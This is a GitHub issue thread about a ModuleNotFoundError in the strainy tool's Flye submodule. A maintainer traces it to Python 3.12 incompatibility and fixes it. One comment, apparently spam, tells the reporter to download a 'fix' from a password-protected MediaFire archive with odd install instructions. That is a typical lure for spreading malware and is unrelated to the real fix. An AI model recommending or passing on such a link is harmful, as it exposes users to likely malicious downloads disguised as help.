### ISSUE TITLE
Issue with Running Strainy - ModuleNotFoundError: No module named 'flye.six.moves'

### ISSUE THREAD

**Issue by GuillermoIllan** [katerinakazantseva/metaPhase#81]
Dear maintainers,

I encountered an issue while trying to run the strainy program after following the installation instructions provided in the repository. Below are the steps I followed:

`git clone https://github.com/katerinakazantseva/strainy`
`cd strainy`
`git submodule update --init`
`make -C submodules/Flye`
`conda env create -f environment.yml -n strainy` 

However, when I attempt to run the program using the command `./strainy.py -h`, I receive the following error:

`Matplotlib is building the font cache; this may take a moment.
Traceback (most recent call last):
  File "/home/guillermo/software/strainy/./strainy.py", line 29, in <module>
    main()
  File "/home/guillermo/software/strainy/./strainy.py", line 24, in main
    import strainy.main
  File "/home/guillermo/software/strainy/strainy/main.py", line 11, in <module>
    from strainy.phase import phase_main
  File "/home/guillermo/software/strainy/strainy/phase.py", line 15, in <module>
    from strainy.flye_consensus import FlyeConsensus
  File "/home/guillermo/software/strainy/strainy/flye_consensus.py", line 22, in <module>
    from flye.main import _run_polisher_only
  File "/home/guillermo/software/strainy/submodules/Flye/flye/main.py", line 19, in <module>
    import flye.polishing.alignment as aln
  File "/home/guillermo/software/strainy/submodules/Flye/flye/polishing/alignment.py", line 18, in <module>
    import flye.utils.fasta_parser as fp
  File "/home/guillermo/software/strainy/submodules/Flye/flye/utils/fasta_parser.py", line 26, in <module>
    from flye.six.moves import range
ModuleNotFoundError: No module named 'flye.six.moves'
`

It seems that there is an issue with the Flye submodule, specifically a missing module flye.six.moves.

Could you please provide guidance on how to resolve this issue?

Thank you for your help and for maintaining this project!

Best regards,
Guillermo Illan

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mikolmogorov** [comment]
Hello,

This is due to Flye failing to install with Python 3.12: https://github.com/mikolmogorov/Flye/issues/669. The best solution for now is using an earlier version of python - or alternatively try the provided docker container. We are aiming to fix this in the future on the Flye side.

**Comment by mikolmogorov** [comment]
In fact, just pushed an update - I think it should work with 3.12 now.

**Comment by GuillermoIllan** [comment]
> In fact, just pushed an update - I think it should work with 3.12 now.

Thank you so much! The problem is solved and strainy is working properly.
